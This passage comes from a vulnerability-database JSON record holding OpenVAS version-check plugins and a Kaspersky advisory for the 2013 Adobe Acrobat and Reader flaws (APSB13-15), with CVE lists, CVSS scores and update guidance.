See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803617\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:51:02 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Acrobat Version 11.0.03 or 10.1.7 or 9.5.5 or 
later.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.5 on Mac OS X\nAdobe Acrobat Version 10.x prior to 10.1.7 on Mac OS X\nAdobe Acrobat Version 11.x prior to 11.0.03 on Mac OS X\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!acrobatVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", 
"published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803614", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803614\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:15:11 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more 
information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Mac OS X\nAdobe Reader X Version 10.x prior to 10.1.7 on Mac OS X\nAdobe Reader XI Version 11.x prior to 11.0.03 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:13", "bulletinFamily": "scanner", "description": "This host is installed with Adobe 
Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803613", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803613\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 09:32:40 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more 
information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Windows\n\nAdobe Reader X Version 10.x prior to 10.1.7 on Windows\n\nAdobe Reader XI Version 11.x prior to 11.0.03 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer && readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:07", "bulletinFamily": "scanner", "description": "This host is installed with 
Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803615", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_lin.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803615\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 09:55:39 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more 
information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9\")\n{\n if(version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:36", "bulletinFamily": "info", "description": "### *Detect date*:\n08/08/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat & Reader. 
Malicious users can exploit these vulnerabilities to cause denial of service, bypass security, obtain sensitive information or execute arbitrary code.\n\n### *Affected products*:\nAdobe Reader XI versions 11.0.02 and earlier \nAdobe Reader X versions 10.1.6 and earlier \nAdobe Reader 9 versions 9.5.4 and earlier \nAdobe Acrobat XI versions 11.0.02 and earlier \nAdobe Acrobat X versions 10.1.6 and earlier \nAdobe Acrobat 9 versions 9.5.4 and earlier\n\n### *Solution*:\nUpdate to the latest version \n[get reader](<https://get.adobe.com/reader/?loc=ru>)\n\n### *Original advisories*:\n[APSB](<http://www.adobe.com/support/security/bulletins/apsb13-15.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Reader](<https://threats.kaspersky.com/en/product/Adobe-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2013-3346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3346>)10.0Critical \n[CVE-2013-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3342>)10.0Critical \n[CVE-2013-3341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3341>)10.0Critical \n[CVE-2013-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3340>)10.0Critical \n[CVE-2013-3339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3339>)10.0Critical \n[CVE-2013-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3338>)10.0Critical \n[CVE-2013-3337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3337>)10.0Critical \n[CVE-2013-2736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2736>)10.0Critical \n[CVE-2013-2737](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2737>)5.0Critical \n[CVE-2013-2734](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2734>)10.0Critical \n[CVE-2013-2735](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2735>)10.0Critical \n[CVE-2013-2732](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2732>)10.0Critical 
\n[CVE-2013-2733](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2733>)10.0Critical \n[CVE-2013-2730](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2730>)10.0Critical \n[CVE-2013-2731](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2731>)10.0Critical \n[CVE-2013-2727](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2727>)10.0Critical \n[CVE-2013-2729](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729>)10.0Critical \n[CVE-2013-2726](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2726>)10.0Critical \n[CVE-2013-2725](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2725>)10.0Critical \n[CVE-2013-2718](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2718>)10.0Critical \n[CVE-2013-2550](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2550>)7.5Critical \n[CVE-2013-2720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2720>)10.0Critical \n[CVE-2013-2719](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2719>)10.0Critical \n[CVE-2013-2722](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2722>)10.0Critical \n[CVE-2013-2721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2721>)10.0Critical \n[CVE-2013-2724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2724>)10.0Critical \n[CVE-2013-2723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2723>)10.0Critical \n[CVE-2013-2549](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2549>)7.5Critical", "modified": "2019-03-07T00:00:00", "published": "2013-08-08T00:00:00", "id": "KLA10457", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10457", "title": "\r KLA10457Adobe Acrobat & Reader multiple vulnerabilities ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}